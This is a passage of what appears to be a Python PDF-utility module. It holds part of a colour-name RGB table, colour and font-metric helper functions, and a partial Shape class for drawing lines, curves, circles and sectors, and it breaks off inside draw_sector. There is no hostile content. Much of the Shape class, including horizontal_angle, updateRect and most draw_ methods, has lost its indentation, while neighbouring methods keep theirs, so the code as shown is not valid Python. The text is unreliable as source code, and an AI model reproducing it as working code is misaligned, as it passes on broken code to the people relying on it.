("DARKSLATEBLUE", 72, 61, 139),
("DARKSLATEGRAY", 47, 79, 79),
("DARKTURQUOISE", 0, 206, 209),
("DARKVIOLET", 148, 0, 211),
("DEEPPINK", 255, 20, 147),
("DEEPPINK1", 255, 20, 147),
("DEEPPINK2", 238, 18, 137),
("DEEPPINK3", 205, 16, 118),
("DEEPPINK4", 139, 10, 80),
("DEEPSKYBLUE", 0, 191, 255),
("DEEPSKYBLUE1", 0, 191, 255),
("DEEPSKYBLUE2", 0, 178, 238),
("DEEPSKYBLUE3", 0, 154, 205),
("DEEPSKYBLUE4", 0, 104, 139),
("DIMGRAY", 105, 105, 105),
("DODGERBLUE", 30, 144, 255),
("DODGERBLUE1", 30, 144, 255),
("DODGERBLUE2", 28, 134, 238),
("DODGERBLUE3", 24, 116, 205),
("DODGERBLUE4", 16, 78, 139),
("FIREBRICK", 178, 34, 34),
("FIREBRICK1", 255, 48, 48),
("FIREBRICK2", 238, 44, 44),
("FIREBRICK3", 205, 38, 38),
("FIREBRICK4", 139, 26, 26),
("FLORALWHITE", 255, 250, 240),
("FORESTGREEN", 34, 139, 34),
("GAINSBORO", 220, 220, 220),
("GHOSTWHITE", 248, 248, 255),
("GOLD", 255, 215, 0),
("GOLD1", 255, 215, 0),
("GOLD2", 238, 201, 0),
("GOLD3", 205, 173, 0),
("GOLD4", 139, 117, 0),
("GOLDENROD", 218, 165, 32),
("GOLDENROD1", 255, 193, 37),
("GOLDENROD2", 238, 180, 34),
("GOLDENROD3", 205, 155, 29),
("GOLDENROD4", 139, 105, 20),
("GREEN YELLOW", 173, 255, 47),
("GREEN", 0, 255, 0),
("GREEN1", 0, 255, 0),
("GREEN2", 0, 238, 0),
("GREEN3", 0, 205, 0),
("GREEN4", 0, 139, 0),
("GREENYELLOW", 173, 255, 47),
("GRAY", 190, 190, 190),
("GRAY0", 0, 0, 0),
("GRAY1", 3, 3, 3),
("GRAY10", 26, 26, 26),
("GRAY100", 255, 255, 255),
("GRAY11", 28, 28, 28),
("GRAY12", 31, 31, 31),
("GRAY13", 33, 33, 33),
("GRAY14", 36, 36, 36),
("GRAY15", 38, 38, 38),
("GRAY16", 41, 41, 41),
("GRAY17", 43, 43, 43),
("GRAY18", 46, 46, 46),
("GRAY19", 48, 48, 48),
("GRAY2", 5, 5, 5),
("GRAY20", 51, 51, 51),
("GRAY21", 54, 54, 54),
("GRAY22", 56, 56, 56),
("GRAY23", 59, 59, 59),
("GRAY24", 61, 61, 61),
("GRAY25", 64, 64, 64),
("GRAY26", 66, 66, 66),
("GRAY27", 69, 69, 69),
("GRAY28", 71, 71, 71),
("GRAY29", 74, 74, 74),
("GRAY3", 8, 8, 8),
("GRAY30", 77, 77, 77),
("GRAY31", 79, 79, 79),
("GRAY32", 82, 82, 82),
("GRAY33", 84, 84, 84),
("GRAY34", 87, 87, 87),
("GRAY35", 89, 89, 89),
("GRAY36", 92, 92, 92),
("GRAY37", 94, 94, 94),
("GRAY38", 97, 97, 97),
("GRAY39", 99, 99, 99),
("GRAY4", 10, 10, 10),
("GRAY40", 102, 102, 102),
("GRAY41", 105, 105, 105),
("GRAY42", 107, 107, 107),
("GRAY43", 110, 110, 110),
("GRAY44", 112, 112, 112),
("GRAY45", 115, 115, 115),
("GRAY46", 117, 117, 117),
("GRAY47", 120, 120, 120),
("GRAY48", 122, 122, 122),
("GRAY49", 125, 125, 125),
("GRAY5", 13, 13, 13),
("GRAY50", 127, 127, 127),
("GRAY51", 130, 130, 130),
("GRAY52", 133, 133, 133),
("GRAY53", 135, 135, 135),
("GRAY54", 138, 138, 138),
("GRAY55", 140, 140, 140),
("GRAY56", 143, 143, 143),
("GRAY57", 145, 145, 145),
("GRAY58", 148, 148, 148),
("GRAY59", 150, 150, 150),
("GRAY6", 15, 15, 15),
("GRAY60", 153, 153, 153),
("GRAY61", 156, 156, 156),
("GRAY62", 158, 158, 158),
("GRAY63", 161, 161, 161),
("GRAY64", 163, 163, 163),
("GRAY65", 166, 166, 166),
("GRAY66", 168, 168, 168),
("GRAY67", 171, 171, 171),
("GRAY68", 173, 173, 173),
("GRAY69", 176, 176, 176),
("GRAY7", 18, 18, 18),
("GRAY70", 179, 179, 179),
("GRAY71", 181, 181, 181),
("GRAY72", 184, 184, 184),
("GRAY73", 186, 186, 186),
("GRAY74", 189, 189, 189),
("GRAY75", 191, 191, 191),
("GRAY76", 194, 194, 194),
("GRAY77", 196, 196, 196),
("GRAY78", 199, 199, 199),
("GRAY79", 201, 201, 201),
("GRAY8", 20, 20, 20),
("GRAY80", 204, 204, 204),
("GRAY81", 207, 207, 207),
("GRAY82", 209, 209, 209),
("GRAY83", 212, 212, 212),
("GRAY84", 214, 214, 214),
("GRAY85", 217, 217, 217),
("GRAY86", 219, 219, 219),
("GRAY87", 222, 222, 222),
("GRAY88", 224, 224, 224),
("GRAY89", 227, 227, 227),
("GRAY9", 23, 23, 23),
("GRAY90", 229, 229, 229),
("GRAY91", 232, 232, 232),
("GRAY92", 235, 235, 235),
("GRAY93", 237, 237, 237),
("GRAY94", 240, 240, 240),
("GRAY95", 242, 242, 242),
("GRAY96", 245, 245, 245),
("GRAY97", 247, 247, 247),
("GRAY98", 250, 250, 250),
("GRAY99", 252, 252, 252),
("HONEYDEW", 240, 255, 240),
("HONEYDEW1", 240, 255, 240),
("HONEYDEW2", 224, 238, 224),
("HONEYDEW3", 193, 205, 193),
("HONEYDEW4", 131, 139, 131),
("HOTPINK", 255, 105, 180),
("HOTPINK1", 255, 110, 180),
("HOTPINK2", 238, 106, 167),
("HOTPINK3", 205, 96, 144),
("HOTPINK4", 139, 58, 98),
("INDIANRED", 205, 92, 92),
("INDIANRED1", 255, 106, 106),
("INDIANRED2", 238, 99, 99),
("INDIANRED3", 205, 85, 85),
("INDIANRED4", 139, 58, 58),
("IVORY", 255, 255, 240),
("IVORY1", 255, 255, 240),
("IVORY2", 238, 238, 224),
("IVORY3", 205, 205, 193),
("IVORY4", 139, 139, 131),
("KHAKI", 240, 230, 140),
("KHAKI1", 255, 246, 143),
("KHAKI2", 238, 230, 133),
("KHAKI3", 205, 198, 115),
("KHAKI4", 139, 134, 78),
("LAVENDER", 230, 230, 250),
("LAVENDERBLUSH", 255, 240, 245),
("LAVENDERBLUSH1", 255, 240, 245),
("LAVENDERBLUSH2", 238, 224, 229),
("LAVENDERBLUSH3", 205, 193, 197),
("LAVENDERBLUSH4", 139, 131, 134),
("LAWNGREEN", 124, 252, 0),
("LEMONCHIFFON", 255, 250, 205),
("LEMONCHIFFON1", 255, 250, 205),
("LEMONCHIFFON2", 238, 233, 191),
("LEMONCHIFFON3", 205, 201, 165),
("LEMONCHIFFON4", 139, 137, 112),
("LIGHTBLUE", 173, 216, 230),
("LIGHTBLUE1", 191, 239, 255),
("LIGHTBLUE2", 178, 223, 238),
("LIGHTBLUE3", 154, 192, 205),
("LIGHTBLUE4", 104, 131, 139),
("LIGHTCORAL", 240, 128, 128),
("LIGHTCYAN", 224, 255, 255),
("LIGHTCYAN1", 224, 255, 255),
("LIGHTCYAN2", 209, 238, 238),
("LIGHTCYAN3", 180, 205, 205),
("LIGHTCYAN4", 122, 139, 139),
("LIGHTGOLDENROD", 238, 221, 130),
("LIGHTGOLDENROD1", 255, 236, 139),
("LIGHTGOLDENROD2", 238, 220, 130),
("LIGHTGOLDENROD3", 205, 190, 112),
("LIGHTGOLDENROD4", 139, 129, 76),
("LIGHTGOLDENRODYELLOW", 250, 250, 210),
("LIGHTGREEN", 144, 238, 144),
("LIGHTGRAY", 211, 211, 211),
("LIGHTPINK", 255, 182, 193),
("LIGHTPINK1", 255, 174, 185),
("LIGHTPINK2", 238, 162, 173),
("LIGHTPINK3", 205, 140, 149),
("LIGHTPINK4", 139, 95, 101),
("LIGHTSALMON", 255, 160, 122),
("LIGHTSALMON1", 255, 160, 122),
("LIGHTSALMON2", 238, 149, 114),
("LIGHTSALMON3", 205, 129, 98),
("LIGHTSALMON4", 139, 87, 66),
("LIGHTSEAGREEN", 32, 178, 170),
("LIGHTSKYBLUE", 135, 206, 250),
("LIGHTSKYBLUE1", 176, 226, 255),
("LIGHTSKYBLUE2", 164, 211, 238),
("LIGHTSKYBLUE3", 141, 182, 205),
("LIGHTSKYBLUE4", 96, 123, 139),
("LIGHTSLATEBLUE", 132, 112, 255),
("LIGHTSLATEGRAY", 119, 136, 153),
("LIGHTSTEELBLUE", 176, 196, 222),
("LIGHTSTEELBLUE1", 202, 225, 255),
("LIGHTSTEELBLUE2", 188, 210, 238),
("LIGHTSTEELBLUE3", 162, 181, 205),
("LIGHTSTEELBLUE4", 110, 123, 139),
("LIGHTYELLOW", 255, 255, 224),
("LIGHTYELLOW1", 255, 255, 224),
("LIGHTYELLOW2", 238, 238, 209),
("LIGHTYELLOW3", 205, 205, 180),
("LIGHTYELLOW4", 139, 139, 122),
("LIMEGREEN", 50, 205, 50),
("LINEN", 250, 240, 230),
("MAGENTA", 255, 0, 255),
("MAGENTA1", 255, 0, 255),
("MAGENTA2", 238, 0, 238),
("MAGENTA3", 205, 0, 205),
("MAGENTA4", 139, 0, 139),
("MAROON", 176, 48, 96),
("MAROON1", 255, 52, 179),
("MAROON2", 238, 48, 167),
("MAROON3", 205, 41, 144),
("MAROON4", 139, 28, 98),
("MEDIUMAQUAMARINE", 102, 205, 170),
("MEDIUMBLUE", 0, 0, 205),
("MEDIUMORCHID", 186, 85, 211),
("MEDIUMORCHID1", 224, 102, 255),
("MEDIUMORCHID2", 209, 95, 238),
("MEDIUMORCHID3", 180, 82, 205),
("MEDIUMORCHID4", 122, 55, 139),
("MEDIUMPURPLE", 147, 112, 219),
("MEDIUMPURPLE1", 171, 130, 255),
("MEDIUMPURPLE2", 159, 121, 238),
("MEDIUMPURPLE3", 137, 104, 205),
("MEDIUMPURPLE4", 93, 71, 139),
("MEDIUMSEAGREEN", 60, 179, 113),
("MEDIUMSLATEBLUE", 123, 104, 238),
("MEDIUMSPRINGGREEN", 0, 250, 154),
("MEDIUMTURQUOISE", 72, 209, 204),
("MEDIUMVIOLETRED", 199, 21, 133),
("MIDNIGHTBLUE", 25, 25, 112),
("MINTCREAM", 245, 255, 250),
("MISTYROSE", 255, 228, 225),
("MISTYROSE1", 255, 228, 225),
("MISTYROSE2", 238, 213, 210),
("MISTYROSE3", 205, 183, 181),
("MISTYROSE4", 139, 125, 123),
("MOCCASIN", 255, 228, 181),
("MUPDFBLUE", 37, 114, 172),
("NAVAJOWHITE", 255, 222, 173),
("NAVAJOWHITE1", 255, 222, 173),
("NAVAJOWHITE2", 238, 207, 161),
("NAVAJOWHITE3", 205, 179, 139),
("NAVAJOWHITE4", 139, 121, 94),
("NAVY", 0, 0, 128),
("NAVYBLUE", 0, 0, 128),
("OLDLACE", 253, 245, 230),
("OLIVEDRAB", 107, 142, 35),
("OLIVEDRAB1", 192, 255, 62),
("OLIVEDRAB2", 179, 238, 58),
("OLIVEDRAB3", 154, 205, 50),
("OLIVEDRAB4", 105, 139, 34),
("ORANGE", 255, 165, 0),
("ORANGE1", 255, 165, 0),
("ORANGE2", 238, 154, 0),
("ORANGE3", 205, 133, 0),
("ORANGE4", 139, 90, 0),
("ORANGERED", 255, 69, 0),
("ORANGERED1", 255, 69, 0),
("ORANGERED2", 238, 64, 0),
("ORANGERED3", 205, 55, 0),
("ORANGERED4", 139, 37, 0),
("ORCHID", 218, 112, 214),
("ORCHID1", 255, 131, 250),
("ORCHID2", 238, 122, 233),
("ORCHID3", 205, 105, 201),
("ORCHID4", 139, 71, 137),
("PALEGOLDENROD", 238, 232, 170),
("PALEGREEN", 152, 251, 152),
("PALEGREEN1", 154, 255, 154),
("PALEGREEN2", 144, 238, 144),
("PALEGREEN3", 124, 205, 124),
("PALEGREEN4", 84, 139, 84),
("PALETURQUOISE", 175, 238, 238),
("PALETURQUOISE1", 187, 255, 255),
("PALETURQUOISE2", 174, 238, 238),
("PALETURQUOISE3", 150, 205, 205),
("PALETURQUOISE4", 102, 139, 139),
("PALEVIOLETRED", 219, 112, 147),
("PALEVIOLETRED1", 255, 130, 171),
("PALEVIOLETRED2", 238, 121, 159),
("PALEVIOLETRED3", 205, 104, 137),
("PALEVIOLETRED4", 139, 71, 93),
("PAPAYAWHIP", 255, 239, 213),
("PEACHPUFF", 255, 218, 185),
("PEACHPUFF1", 255, 218, 185),
("PEACHPUFF2", 238, 203, 173),
("PEACHPUFF3", 205, 175, 149),
("PEACHPUFF4", 139, 119, 101),
("PERU", 205, 133, 63),
("PINK", 255, 192, 203),
("PINK1", 255, 181, 197),
("PINK2", 238, 169, 184),
("PINK3", 205, 145, 158),
("PINK4", 139, 99, 108),
("PLUM", 221, 160, 221),
("PLUM1", 255, 187, 255),
("PLUM2", 238, 174, 238),
("PLUM3", 205, 150, 205),
("PLUM4", 139, 102, 139),
("POWDERBLUE", 176, 224, 230),
("PURPLE", 160, 32, 240),
("PURPLE1", 155, 48, 255),
("PURPLE2", 145, 44, 238),
("PURPLE3", 125, 38, 205),
("PURPLE4", 85, 26, 139),
("PY_COLOR", 240, 255, 210),
("RED", 255, 0, 0),
("RED1", 255, 0, 0),
("RED2", 238, 0, 0),
("RED3", 205, 0, 0),
("RED4", 139, 0, 0),
("ROSYBROWN", 188, 143, 143),
("ROSYBROWN1", 255, 193, 193),
("ROSYBROWN2", 238, 180, 180),
("ROSYBROWN3", 205, 155, 155),
("ROSYBROWN4", 139, 105, 105),
("ROYALBLUE", 65, 105, 225),
("ROYALBLUE1", 72, 118, 255),
("ROYALBLUE2", 67, 110, 238),
("ROYALBLUE3", 58, 95, 205),
("ROYALBLUE4", 39, 64, 139),
("SADDLEBROWN", 139, 69, 19),
("SALMON", 250, 128, 114),
("SALMON1", 255, 140, 105),
("SALMON2", 238, 130, 98),
("SALMON3", 205, 112, 84),
("SALMON4", 139, 76, 57),
("SANDYBROWN", 244, 164, 96),
("SEAGREEN", 46, 139, 87),
("SEAGREEN1", 84, 255, 159),
("SEAGREEN2", 78, 238, 148),
("SEAGREEN3", 67, 205, 128),
("SEAGREEN4", 46, 139, 87),
("SEASHELL", 255, 245, 238),
("SEASHELL1", 255, 245, 238),
("SEASHELL2", 238, 229, 222),
("SEASHELL3", 205, 197, 191),
("SEASHELL4", 139, 134, 130),
("SIENNA", 160, 82, 45),
("SIENNA1", 255, 130, 71),
("SIENNA2", 238, 121, 66),
("SIENNA3", 205, 104, 57),
("SIENNA4", 139, 71, 38),
("SKYBLUE", 135, 206, 235),
("SKYBLUE1", 135, 206, 255),
("SKYBLUE2", 126, 192, 238),
("SKYBLUE3", 108, 166, 205),
("SKYBLUE4", 74, 112, 139),
("SLATEBLUE", 106, 90, 205),
("SLATEBLUE1", 131, 111, 255),
("SLATEBLUE2", 122, 103, 238),
("SLATEBLUE3", 105, 89, 205),
("SLATEBLUE4", 71, 60, 139),
("SLATEGRAY", 112, 128, 144),
("SNOW", 255, 250, 250),
("SNOW1", 255, 250, 250),
("SNOW2", 238, 233, 233),
("SNOW3", 205, 201, 201),
("SNOW4", 139, 137, 137),
("SPRINGGREEN", 0, 255, 127),
("SPRINGGREEN1", 0, 255, 127),
("SPRINGGREEN2", 0, 238, 118),
("SPRINGGREEN3", 0, 205, 102),
("SPRINGGREEN4", 0, 139, 69),
("STEELBLUE", 70, 130, 180),
("STEELBLUE1", 99, 184, 255),
("STEELBLUE2", 92, 172, 238),
("STEELBLUE3", 79, 148, 205),
("STEELBLUE4", 54, 100, 139),
("TAN", 210, 180, 140),
("TAN1", 255, 165, 79),
("TAN2", 238, 154, 73),
("TAN3", 205, 133, 63),
("TAN4", 139, 90, 43),
("THISTLE", 216, 191, 216),
("THISTLE1", 255, 225, 255),
("THISTLE2", 238, 210, 238),
("THISTLE3", 205, 181, 205),
("THISTLE4", 139, 123, 139),
("TOMATO", 255, 99, 71),
("TOMATO1", 255, 99, 71),
("TOMATO2", 238, 92, 66),
("TOMATO3", 205, 79, 57),
("TOMATO4", 139, 54, 38),
("TURQUOISE", 64, 224, 208),
("TURQUOISE1", 0, 245, 255),
("TURQUOISE2", 0, 229, 238),
("TURQUOISE3", 0, 197, 205),
("TURQUOISE4", 0, 134, 139),
("VIOLET", 238, 130, 238),
("VIOLETRED", 208, 32, 144),
("VIOLETRED1", 255, 62, 150),
("VIOLETRED2", 238, 58, 140),
("VIOLETRED3", 205, 50, 120),
("VIOLETRED4", 139, 34, 82),
("WHEAT", 245, 222, 179),
("WHEAT1", 255, 231, 186),
("WHEAT2", 238, 216, 174),
("WHEAT3", 205, 186, 150),
("WHEAT4", 139, 126, 102),
("WHITE", 255, 255, 255),
("WHITESMOKE", 245, 245, 245),
("YELLOW", 255, 255, 0),
("YELLOW1", 255, 255, 0),
("YELLOW2", 238, 238, 0),
("YELLOW3", 205, 205, 0),
("YELLOW4", 139, 139, 0),
("YELLOWGREEN", 154, 205, 50),
]
def getColorInfoDict() -> dict:
    """Return a dict mapping lowercase color names to their RGB int triples."""
    return {item[0].lower(): item[1:] for item in getColorInfoList()}
def getColor(name: str) -> tuple:
    """Retrieve RGB color in PDF format by name.

    Returns:
        a triple of floats in range 0 to 1. In case of name-not-found, "white" is returned.
    """
    try:
        c = getColorInfoList()[getColorList().index(name.upper())]
        return (c[1] / 255.0, c[2] / 255.0, c[3] / 255.0)
    # ValueError: name not in the list; AttributeError: 'name' is not a str.
    # A bare 'except' here would also swallow KeyboardInterrupt / SystemExit.
    except (ValueError, AttributeError):
        return (1, 1, 1)
def getColorHSV(name: str) -> tuple:
    """Retrieve the hue, saturation, value triple of a color name.

    Returns:
        a triple (degree, percent, percent). If not found (-1, -1, -1) is returned.
    """
    try:
        x = getColorInfoList()[getColorList().index(name.upper())]
    # ValueError: name not in the list; AttributeError: 'name' is not a str.
    # Narrowed from a bare 'except' so real interrupts still propagate.
    except (ValueError, AttributeError):
        return (-1, -1, -1)
    # normalize the 0..255 channel values to 0..1
    r = x[1] / 255.0
    g = x[2] / 255.0
    b = x[3] / 255.0
    cmax = max(r, g, b)
    V = round(cmax * 100, 1)  # value = brightest channel, in percent
    cmin = min(r, g, b)
    delta = cmax - cmin
    # hue depends on which channel dominates (standard RGB->HSV formula)
    if delta == 0:
        hue = 0
    elif cmax == r:
        hue = 60.0 * (((g - b) / delta) % 6)
    elif cmax == g:
        hue = 60.0 * (((b - r) / delta) + 2)
    else:
        hue = 60.0 * (((r - g) / delta) + 4)
    H = int(round(hue))
    # saturation is chroma relative to value (0 for black)
    if cmax == 0:
        sat = 0
    else:
        sat = delta / cmax
    S = int(round(sat * 100))
    return (H, S, V)
def _get_font_properties(doc: Document, xref: int) -> tuple:
    """Return (fontname, ext, stype, ascender, descender) for a font xref.

    Falls back to generic metrics when the font cannot be loaded:
    defaults 0.8 / -0.2 are scaled by 1.2 on a load failure.
    """
    fontname, ext, stype, buffer = doc.extract_font(xref)
    asc = 0.8  # default ascender
    dsc = -0.2  # default descender
    if ext == "":
        return fontname, ext, stype, asc, dsc
    if buffer:
        try:
            font = Font(fontbuffer=buffer)
            asc = font.ascender
            dsc = font.descender
            bbox = font.bbox
            # ensure a plausible line height: widen metrics to span >= 1
            if asc - dsc < 1:
                if bbox.y0 < dsc:
                    dsc = bbox.y0
                asc = 1 - dsc
        except Exception:  # best-effort fallback; was a bare 'except'
            asc *= 1.2
            dsc *= 1.2
        return fontname, ext, stype, asc, dsc
    if ext != "n/a":
        try:
            font = Font(fontname)
            asc = font.ascender
            dsc = font.descender
        except Exception:  # best-effort fallback; was a bare 'except'
            asc *= 1.2
            dsc *= 1.2
    else:
        asc *= 1.2
        dsc *= 1.2
    return fontname, ext, stype, asc, dsc
def get_char_widths(
    doc: Document, xref: int, limit: int = 256, idx: int = 0, fontdict: OptDict = None
) -> list:
    """Get list of glyph information of a font.

    Notes:
        Must be provided by its XREF number. If we already dealt with the
        font, it will be recorded in doc.FontInfos. Otherwise we insert an
        entry there.
        Finally we return the glyphs for the font. This is a list of
        (glyph, width) where glyph is an integer controlling the char
        appearance, and width is a float controlling the char's spacing:
        width * fontsize is the actual space.
        For 'simple' fonts, glyph == ord(char) will usually be true.
        Exceptions are 'Symbol' and 'ZapfDingbats'. We are providing data for these directly here.
    """
    fontinfo = CheckFontInfo(doc, xref)
    if fontinfo is None:  # not recorded yet: create it
        if fontdict is None:
            # derive the font properties from the xref itself
            name, ext, stype, asc, dsc = _get_font_properties(doc, xref)
            fontdict = {
                "name": name,
                "type": stype,
                "ext": ext,
                "ascender": asc,
                "descender": dsc,
            }
        else:
            name = fontdict["name"]
            ext = fontdict["ext"]
            stype = fontdict["type"]
            ordering = fontdict["ordering"]
            simple = fontdict["simple"]
        if ext == "":
            raise ValueError("xref is not a font")
        # check for 'simple' fonts
        if stype in ("Type1", "MMType1", "TrueType"):
            simple = True
        else:
            simple = False
        # check for CJK fonts: map the base name to a CID ordering number
        if name in ("Fangti", "Ming"):
            ordering = 0
        elif name in ("Heiti", "Song"):
            ordering = 1
        elif name in ("Gothic", "Mincho"):
            ordering = 2
        elif name in ("Dotum", "Batang"):
            ordering = 3
        else:
            ordering = -1  # not a CJK font
        fontdict["simple"] = simple
        # Symbol / ZapfDingbats get their glyph tables from module constants
        if name == "ZapfDingbats":
            glyphs = zapf_glyphs
        elif name == "Symbol":
            glyphs = symbol_glyphs
        else:
            glyphs = None
        fontdict["glyphs"] = glyphs
        fontdict["ordering"] = ordering
        fontinfo = [xref, fontdict]
        doc.FontInfos.append(fontinfo)  # cache for subsequent calls
    else:
        # font already recorded: reuse the cached properties
        fontdict = fontinfo[1]
        glyphs = fontdict["glyphs"]
        simple = fontdict["simple"]
        ordering = fontdict["ordering"]
    if glyphs is None:
        oldlimit = 0
    else:
        oldlimit = len(glyphs)
    mylimit = max(256, limit)  # never compute fewer than 256 glyphs
    if mylimit <= oldlimit:  # cached table already large enough
        return glyphs
    if ordering < 0:  # not a CJK font
        glyphs = doc._get_char_widths(
            xref, fontdict["name"], fontdict["ext"], fontdict["ordering"], mylimit, idx
        )
    else:  # CJK fonts use char codes and width = 1
        glyphs = None
    fontdict["glyphs"] = glyphs
    fontinfo[1] = fontdict
    UpdateFontInfo(doc, fontinfo)  # write the refreshed entry back to the cache
    return glyphs
class Shape(object):
"""Create a new shape."""
@staticmethod
def horizontal_angle(C, P):
"""Return the angle to the horizontal for the connection from C to P.
This uses the arcus sine function and resolves its inherent ambiguity by
looking up in which quadrant vector S = P - C is located.
"""
S = Point(P - C).unit # unit vector 'C' -> 'P'
alfa = math.asin(abs(S.y)) # absolute angle from horizontal
if S.x < 0: # make arcsin result unique
if S.y <= 0: # bottom-left
alfa = -(math.pi - alfa)
else: # top-left
alfa = math.pi - alfa
else:
if S.y >= 0: # top-right
pass
else: # bottom-right
alfa = -alfa
return alfa
    def __init__(self, page: Page):
        """Create an empty shape attached to 'page' (must be a PDF page)."""
        CheckParent(page)  # raises if page has been closed / orphaned
        self.page = page
        self.doc = page.parent
        if not self.doc.is_pdf:
            raise ValueError("is no PDF")
        self.height = page.mediabox_size.y
        self.width = page.mediabox_size.x
        # cropbox offset relative to the mediabox
        self.x = page.cropbox_position.x
        self.y = page.cropbox_position.y
        self.pctm = page.transformation_matrix  # page transf. matrix
        self.ipctm = ~self.pctm  # inverted transf. matrix
        self.draw_cont = ""  # accumulated draw (path) commands
        self.text_cont = ""  # accumulated text commands
        self.totalcont = ""  # committed content of finished shapes
        self.lastPoint = None  # current pen position
        self.rect = None  # bbox of everything drawn so far
def updateRect(self, x):
if self.rect is None:
if len(x) == 2:
self.rect = Rect(x, x)
else:
self.rect = Rect(x)
else:
if len(x) == 2:
x = Point(x)
self.rect.x0 = min(self.rect.x0, x.x)
self.rect.y0 = min(self.rect.y0, x.y)
self.rect.x1 = max(self.rect.x1, x.x)
self.rect.y1 = max(self.rect.y1, x.y)
else:
x = Rect(x)
self.rect.x0 = min(self.rect.x0, x.x0)
self.rect.y0 = min(self.rect.y0, x.y0)
self.rect.x1 = max(self.rect.x1, x.x1)
self.rect.y1 = max(self.rect.y1, x.y1)
def draw_line(self, p1: point_like, p2: point_like) -> Point:
"""Draw a line between two points."""
p1 = Point(p1)
p2 = Point(p2)
if not (self.lastPoint == p1):
self.draw_cont += "%g %g m\n" % JM_TUPLE(p1 * self.ipctm)
self.lastPoint = p1
self.updateRect(p1)
self.draw_cont += "%g %g l\n" % JM_TUPLE(p2 * self.ipctm)
self.updateRect(p2)
self.lastPoint = p2
return self.lastPoint
def draw_polyline(self, points: list) -> Point:
"""Draw several connected line segments."""
for i, p in enumerate(points):
if i == 0:
if not (self.lastPoint == Point(p)):
self.draw_cont += "%g %g m\n" % JM_TUPLE(Point(p) * self.ipctm)
self.lastPoint = Point(p)
else:
self.draw_cont += "%g %g l\n" % JM_TUPLE(Point(p) * self.ipctm)
self.updateRect(p)
self.lastPoint = Point(points[-1])
return self.lastPoint
def draw_bezier(
self,
p1: point_like,
p2: point_like,
p3: point_like,
p4: point_like,
) -> Point:
"""Draw a standard cubic Bezier curve."""
p1 = Point(p1)
p2 = Point(p2)
p3 = Point(p3)
p4 = Point(p4)
if not (self.lastPoint == p1):
self.draw_cont += "%g %g m\n" % JM_TUPLE(p1 * self.ipctm)
self.draw_cont += "%g %g %g %g %g %g c\n" % JM_TUPLE(
list(p2 * self.ipctm) + list(p3 * self.ipctm) + list(p4 * self.ipctm)
)
self.updateRect(p1)
self.updateRect(p2)
self.updateRect(p3)
self.updateRect(p4)
self.lastPoint = p4
return self.lastPoint
def draw_oval(self, tetra: typing.Union[quad_like, rect_like]) -> Point:
"""Draw an ellipse inside a tetrapod."""
if len(tetra) != 4:
raise ValueError("invalid arg length")
if hasattr(tetra[0], "__float__"):
q = Rect(tetra).quad
else:
q = Quad(tetra)
mt = q.ul + (q.ur - q.ul) * 0.5
mr = q.ur + (q.lr - q.ur) * 0.5
mb = q.ll + (q.lr - q.ll) * 0.5
ml = q.ul + (q.ll - q.ul) * 0.5
if not (self.lastPoint == ml):
self.draw_cont += "%g %g m\n" % JM_TUPLE(ml * self.ipctm)
self.lastPoint = ml
self.draw_curve(ml, q.ll, mb)
self.draw_curve(mb, q.lr, mr)
self.draw_curve(mr, q.ur, mt)
self.draw_curve(mt, q.ul, ml)
self.updateRect(q.rect)
self.lastPoint = ml
return self.lastPoint
def draw_circle(self, center: point_like, radius: float) -> Point:
"""Draw a circle given its center and radius."""
if not radius > EPSILON:
raise ValueError("radius must be positive")
center = Point(center)
p1 = center - (radius, 0)
return self.draw_sector(center, p1, 360, fullSector=False)
def draw_curve(
self,
p1: point_like,
p2: point_like,
p3: point_like,
) -> Point:
"""Draw a curve between points using one control point."""
kappa = 0.55228474983
p1 = Point(p1)
p2 = Point(p2)
p3 = Point(p3)
k1 = p1 + (p2 - p1) * kappa
k2 = p3 + (p2 - p3) * kappa
return self.draw_bezier(p1, k1, k2, p3)
    def draw_sector(
        self,
        center: point_like,
        point: point_like,
        beta: float,
        fullSector: bool = True,
    ) -> Point:
        """Draw a circle sector.

        Args:
            center: center of the circle.
            point: arc start point; its distance to 'center' is the radius.
            beta: angle of the sector in degrees.
            fullSector: if True, also draw the two straight legs
                (arc end -> center -> arc start) closing the sector.
        """
        center = Point(center)
        point = Point(point)
        # PDF operator templates: move-to, cubic curve, line-to
        l3 = "%g %g m\n"
        l4 = "%g %g %g %g %g %g c\n"
        l5 = "%g %g l\n"
        betar = math.radians(-beta)
        w360 = math.radians(math.copysign(360, betar)) * (-1)
        w90 = math.radians(math.copysign(90, betar))
        w45 = w90 / 2
        while abs(betar) > 2 * math.pi:
            betar += w360  # bring angle below 360 degrees
        if not (self.lastPoint == point):
            self.draw_cont += l3 % JM_TUPLE(point * self.ipctm)
            self.lastPoint = point
        Q = Point(0, 0)  # just make sure it exists
        C = center
        P = point
        S = P - C  # vector 'center' -> 'point'
        rad = abs(S)  # circle radius
        if not rad > EPSILON:
            raise ValueError("radius must be positive")
        alfa = self.horizontal_angle(center, point)
        while abs(betar) > abs(w90):  # draw 90 degree arcs
            q1 = C.x + math.cos(alfa + w90) * rad
            q2 = C.y + math.sin(alfa + w90) * rad
            Q = Point(q1, q2)  # the arc's end point
            r1 = C.x + math.cos(alfa + w45) * rad / math.cos(w45)
            r2 = C.y + math.sin(alfa + w45) * rad / math.cos(w45)
            R = Point(r1, r2)  # crossing point of tangents
            kappah = (1 - math.cos(w45)) * 4 / 3 / abs(R - Q)
            kappa = kappah * abs(P - Q)
            cp1 = P + (R - P) * kappa  # control point 1
            cp2 = Q + (R - Q) * kappa  # control point 2
            self.draw_cont += l4 % JM_TUPLE(
                list(cp1 * self.ipctm) + list(cp2 * self.ipctm) + list(Q * self.ipctm)
            )
            betar -= w90  # reduce parm angle by 90 deg
            alfa += w90  # advance start angle by 90 deg
            P = Q  # advance to arc end point
        # draw (remaining) arc
        if abs(betar) > 1e-3:  # significant degrees left?
            beta2 = betar / 2
            q1 = C.x + math.cos(alfa + betar) * rad
            q2 = C.y + math.sin(alfa + betar) * rad
            Q = Point(q1, q2)  # the arc's end point
            r1 = C.x + math.cos(alfa + beta2) * rad / math.cos(beta2)
            r2 = C.y + math.sin(alfa + beta2) * rad / math.cos(beta2)
            R = Point(r1, r2)  # crossing point of tangents
            # kappa height is 4/3 of segment height
            kappah = (1 - math.cos(beta2)) * 4 / 3 / abs(R - Q)  # kappa height
            kappa = kappah * abs(P - Q) / (1 - math.cos(betar))
            cp1 = P + (R - P) * kappa  # control point 1
            cp2 = Q + (R - Q) * kappa  # control point 2
            self.draw_cont += l4 % JM_TUPLE(
                list(cp1 * self.ipctm) + list(cp2 * self.ipctm) + list(Q * self.ipctm)
            )
        if fullSector:
            # close the pie slice: start -> center -> arc end
